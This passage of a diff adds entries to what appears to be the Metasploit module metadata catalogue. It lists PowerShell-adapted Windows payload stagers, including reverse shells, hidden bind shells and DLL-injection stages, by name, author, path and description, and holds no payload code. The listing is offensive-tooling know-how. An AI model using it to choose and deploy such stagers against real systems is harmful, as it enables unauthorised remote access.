"payload_cmd/windows/powershell/patchupdllinject/bind_ipv6_tcp_uuid": { + "name": "Powershell Exec, Bind IPv6 TCP Stager with UUID Support (Windows x86)", + "fullname": "payload/cmd/windows/powershell/patchupdllinject/bind_ipv6_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "jt ", + "skape ", + "hdm ", + "sf ", + "OJ Reeves" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for an IPv6 connection with UUID Support (Windows x86)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/patchupdllinject/bind_ipv6_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/patchupdllinject/bind_ipv6_tcp_uuid", + "staged": true, + "stage_refname": "windows/patchupdllinject", + "stager_refname": "windows/bind_ipv6_tcp_uuid" + }, + "payload_cmd/windows/powershell/patchupdllinject/bind_named_pipe": { + "name": "Powershell Exec, Windows x86 Bind Named Pipe Stager", + "fullname": "payload/cmd/windows/powershell/patchupdllinject/bind_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "jt ", + "skape ", + "UserExistsError" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a pipe connection (Windows x86)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/patchupdllinject/bind_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/patchupdllinject/bind_named_pipe", + "staged": true, + "stage_refname": "windows/patchupdllinject", + "stager_refname": "windows/bind_named_pipe" + }, + "payload_cmd/windows/powershell/patchupdllinject/bind_nonx_tcp": { + "name": "Powershell Exec, Bind TCP Stager (No NX or Win7)", + "fullname": "payload/cmd/windows/powershell/patchupdllinject/bind_nonx_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "jt ", + "skape ", + "vlad902 " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection (No NX)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/patchupdllinject/bind_nonx_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/patchupdllinject/bind_nonx_tcp", + "staged": true, + "stage_refname": "windows/patchupdllinject", + "stager_refname": "windows/bind_nonx_tcp" + }, + "payload_cmd/windows/powershell/patchupdllinject/bind_tcp": { + "name": "Powershell Exec, Bind TCP Stager (Windows x86)", + "fullname": "payload/cmd/windows/powershell/patchupdllinject/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "jt ", + "skape ", + "hdm ", + "sf " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection (Windows x86)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/patchupdllinject/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/patchupdllinject/bind_tcp", + "staged": true, + "stage_refname": "windows/patchupdllinject", + "stager_refname": "windows/bind_tcp" + }, + "payload_cmd/windows/powershell/patchupdllinject/bind_tcp_rc4": { + "name": "Powershell Exec, Bind TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/powershell/patchupdllinject/bind_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "jt ", + "skape ", + "hdm ", + "sf ", + "mihi", + "RageLtMan" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/patchupdllinject/bind_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/patchupdllinject/bind_tcp_rc4", + "staged": true, + "stage_refname": "windows/patchupdllinject", + "stager_refname": "windows/bind_tcp_rc4" + }, + "payload_cmd/windows/powershell/patchupdllinject/bind_tcp_uuid": { + "name": "Powershell Exec, Bind TCP Stager with UUID Support (Windows x86)", + "fullname": "payload/cmd/windows/powershell/patchupdllinject/bind_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "jt ", + "skape ", + "hdm ", + "OJ Reeves" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection with UUID Support (Windows x86)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/patchupdllinject/bind_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/patchupdllinject/bind_tcp_uuid", + "staged": true, + "stage_refname": "windows/patchupdllinject", + "stager_refname": "windows/bind_tcp_uuid" + }, + "payload_cmd/windows/powershell/patchupdllinject/find_tag": { + "name": "Powershell Exec, Find Tag Ordinal Stager", + "fullname": "payload/cmd/windows/powershell/patchupdllinject/find_tag", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "jt ", + "skape " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nUse an established connection", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/patchupdllinject/find_tag", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/patchupdllinject/find_tag", + "staged": true, + "stage_refname": "windows/patchupdllinject", + "stager_refname": "windows/findtag_ord" + }, + "payload_cmd/windows/powershell/patchupdllinject/reverse_ipv6_tcp": { + "name": "Powershell Exec, Reverse TCP Stager (IPv6)", + "fullname": "payload/cmd/windows/powershell/patchupdllinject/reverse_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "jt ", + "skape ", + "hdm ", + "sf " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker over IPv6", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/patchupdllinject/reverse_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/patchupdllinject/reverse_ipv6_tcp", + "staged": true, + "stage_refname": "windows/patchupdllinject", + "stager_refname": "windows/reverse_ipv6_tcp" + }, + "payload_cmd/windows/powershell/patchupdllinject/reverse_nonx_tcp": { + "name": "Powershell Exec, Reverse TCP Stager (No NX or Win7)", + "fullname": "payload/cmd/windows/powershell/patchupdllinject/reverse_nonx_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "jt ", + "skape ", + "vlad902 " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker (No NX)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/patchupdllinject/reverse_nonx_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/patchupdllinject/reverse_nonx_tcp", + "staged": true, + "stage_refname": "windows/patchupdllinject", + "stager_refname": "windows/reverse_nonx_tcp" + }, + "payload_cmd/windows/powershell/patchupdllinject/reverse_ord_tcp": { + "name": "Powershell Exec, Reverse Ordinal TCP Stager (No NX or Win7)", + "fullname": "payload/cmd/windows/powershell/patchupdllinject/reverse_ord_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "jt ", + "skape ", + "spoonm " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/patchupdllinject/reverse_ord_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/patchupdllinject/reverse_ord_tcp", + "staged": true, + "stage_refname": "windows/patchupdllinject", + "stager_refname": "windows/reverse_ord_tcp" + }, + "payload_cmd/windows/powershell/patchupdllinject/reverse_tcp": { + "name": "Powershell Exec, Reverse TCP Stager", + "fullname": "payload/cmd/windows/powershell/patchupdllinject/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "jt ", + "skape ", + "hdm ", + "sf " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/patchupdllinject/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/patchupdllinject/reverse_tcp", + "staged": true, + "stage_refname": "windows/patchupdllinject", + "stager_refname": "windows/reverse_tcp" + }, + "payload_cmd/windows/powershell/patchupdllinject/reverse_tcp_allports": { + "name": "Powershell Exec, Reverse All-Port TCP Stager", + "fullname": "payload/cmd/windows/powershell/patchupdllinject/reverse_tcp_allports", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "jt ", + "skape ", + "hdm ", + "sf " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nTry to connect back to the attacker, on all possible ports (1-65535, slowly)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/patchupdllinject/reverse_tcp_allports", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/patchupdllinject/reverse_tcp_allports", + "staged": true, + "stage_refname": "windows/patchupdllinject", + "stager_refname": "windows/reverse_tcp_allports" + }, + "payload_cmd/windows/powershell/patchupdllinject/reverse_tcp_dns": { + "name": "Powershell Exec, Reverse TCP Stager (DNS)", + "fullname": "payload/cmd/windows/powershell/patchupdllinject/reverse_tcp_dns", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "jt ", + "skape ", + "hdm ", + "sf ", + "RageLtMan" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/patchupdllinject/reverse_tcp_dns", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/patchupdllinject/reverse_tcp_dns", + "staged": true, + "stage_refname": "windows/patchupdllinject", + "stager_refname": "windows/reverse_tcp_dns" + }, + "payload_cmd/windows/powershell/patchupdllinject/reverse_tcp_rc4": { + "name": "Powershell Exec, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/powershell/patchupdllinject/reverse_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "jt ", + "skape ", + "hdm ", + "sf ", + "mihi", + "RageLtMan" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/patchupdllinject/reverse_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/patchupdllinject/reverse_tcp_rc4", + "staged": true, + "stage_refname": "windows/patchupdllinject", + "stager_refname": "windows/reverse_tcp_rc4" + }, + "payload_cmd/windows/powershell/patchupdllinject/reverse_tcp_rc4_dns": { + "name": "Powershell Exec, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)", + "fullname": "payload/cmd/windows/powershell/patchupdllinject/reverse_tcp_rc4_dns", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "jt ", + "skape ", + "hdm ", + "sf ", + "mihi", + "RageLtMan" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/patchupdllinject/reverse_tcp_rc4_dns", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/patchupdllinject/reverse_tcp_rc4_dns", + "staged": true, + "stage_refname": "windows/patchupdllinject", + "stager_refname": "windows/reverse_tcp_rc4_dns" + }, + "payload_cmd/windows/powershell/patchupdllinject/reverse_tcp_uuid": { + "name": "Powershell Exec, Reverse TCP Stager with UUID Support", + "fullname": "payload/cmd/windows/powershell/patchupdllinject/reverse_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "jt ", + "skape ", + "hdm ", + "OJ Reeves" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker with UUID Support", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/patchupdllinject/reverse_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/patchupdllinject/reverse_tcp_uuid", + "staged": true, + "stage_refname": "windows/patchupdllinject", + "stager_refname": "windows/reverse_tcp_uuid" + }, + "payload_cmd/windows/powershell/patchupmeterpreter/bind_hidden_ipknock_tcp": { + "name": "Powershell Exec, Hidden Bind Ipknock TCP Stager", + "fullname": "payload/cmd/windows/powershell/patchupmeterpreter/bind_hidden_ipknock_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "jt ", + "hdm ", + "sf ", + "Borja Merino " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode", + "references": [ + "URL-http://www.shelliscoming.com/2014/07/ip-knock-shellcode-spoofed-ip-as.html" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/patchupmeterpreter/bind_hidden_ipknock_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/patchupmeterpreter/bind_hidden_ipknock_tcp", + "staged": true, + "stage_refname": "windows/patchupmeterpreter", + "stager_refname": "windows/bind_hidden_ipknock_tcp" + }, + "payload_cmd/windows/powershell/patchupmeterpreter/bind_hidden_tcp": { + "name": "Powershell Exec, Hidden Bind TCP Stager", + "fullname": "payload/cmd/windows/powershell/patchupmeterpreter/bind_hidden_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "jt ", + "hdm ", + "sf ", + "Borja Merino " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.", + "references": [ + "URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/patchupmeterpreter/bind_hidden_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/patchupmeterpreter/bind_hidden_tcp", + "staged": true, + "stage_refname": "windows/patchupmeterpreter", + "stager_refname": "windows/bind_hidden_tcp" + }, + "payload_cmd/windows/powershell/patchupmeterpreter/bind_ipv6_tcp": { + "name": "Powershell Exec, Bind IPv6 TCP Stager (Windows x86)", + "fullname": "payload/cmd/windows/powershell/patchupmeterpreter/bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "jt ", + "hdm ", + "sf " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for an IPv6 connection (Windows x86)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/patchupmeterpreter/bind_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/patchupmeterpreter/bind_ipv6_tcp", + "staged": true, + "stage_refname": "windows/patchupmeterpreter", + "stager_refname": "windows/bind_ipv6_tcp" + }, + "payload_cmd/windows/powershell/patchupmeterpreter/bind_ipv6_tcp_uuid": { + "name": "Powershell Exec, Bind IPv6 TCP Stager with UUID Support (Windows x86)", + "fullname": "payload/cmd/windows/powershell/patchupmeterpreter/bind_ipv6_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "jt ", + "hdm ", + "sf ", + "OJ Reeves" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for an IPv6 connection with UUID Support (Windows x86)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/patchupmeterpreter/bind_ipv6_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/patchupmeterpreter/bind_ipv6_tcp_uuid", + "staged": true, + "stage_refname": "windows/patchupmeterpreter", + "stager_refname": "windows/bind_ipv6_tcp_uuid" + }, + "payload_cmd/windows/powershell/patchupmeterpreter/bind_named_pipe": { + "name": "Powershell Exec, Windows x86 Bind Named Pipe Stager", + "fullname": "payload/cmd/windows/powershell/patchupmeterpreter/bind_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "jt ", + "UserExistsError" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a pipe connection (Windows x86)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/patchupmeterpreter/bind_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/patchupmeterpreter/bind_named_pipe", + "staged": true, + "stage_refname": "windows/patchupmeterpreter", + "stager_refname": "windows/bind_named_pipe" + }, + "payload_cmd/windows/powershell/patchupmeterpreter/bind_nonx_tcp": { + "name": "Powershell Exec, Bind TCP Stager (No NX or Win7)", + "fullname": "payload/cmd/windows/powershell/patchupmeterpreter/bind_nonx_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "jt ", + "vlad902 " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection (No NX)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/patchupmeterpreter/bind_nonx_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/patchupmeterpreter/bind_nonx_tcp", + "staged": true, + "stage_refname": "windows/patchupmeterpreter", + "stager_refname": "windows/bind_nonx_tcp" + }, + "payload_cmd/windows/powershell/patchupmeterpreter/bind_tcp": { + "name": "Powershell Exec, Bind TCP Stager (Windows x86)", + "fullname": "payload/cmd/windows/powershell/patchupmeterpreter/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "jt ", + "hdm ", + "sf " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection (Windows x86)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/patchupmeterpreter/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/patchupmeterpreter/bind_tcp", + "staged": true, + "stage_refname": "windows/patchupmeterpreter", + "stager_refname": "windows/bind_tcp" + }, + "payload_cmd/windows/powershell/patchupmeterpreter/bind_tcp_rc4": { + "name": "Powershell Exec, Bind TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/powershell/patchupmeterpreter/bind_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "jt ", + "hdm ", + "sf ", + "mihi", + "RageLtMan" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/patchupmeterpreter/bind_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/patchupmeterpreter/bind_tcp_rc4", + "staged": true, + "stage_refname": "windows/patchupmeterpreter", + "stager_refname": "windows/bind_tcp_rc4" + }, + "payload_cmd/windows/powershell/patchupmeterpreter/bind_tcp_uuid": { + "name": "Powershell Exec, Bind TCP Stager with UUID Support (Windows x86)", + "fullname": "payload/cmd/windows/powershell/patchupmeterpreter/bind_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "jt ", + "hdm ", + "OJ Reeves" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection with UUID Support (Windows x86)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/patchupmeterpreter/bind_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/patchupmeterpreter/bind_tcp_uuid", + "staged": true, + "stage_refname": "windows/patchupmeterpreter", + "stager_refname": "windows/bind_tcp_uuid" + }, + "payload_cmd/windows/powershell/patchupmeterpreter/find_tag": { + "name": "Powershell Exec, Find Tag Ordinal Stager", + "fullname": "payload/cmd/windows/powershell/patchupmeterpreter/find_tag", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "jt " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nUse an established connection", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/patchupmeterpreter/find_tag", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + 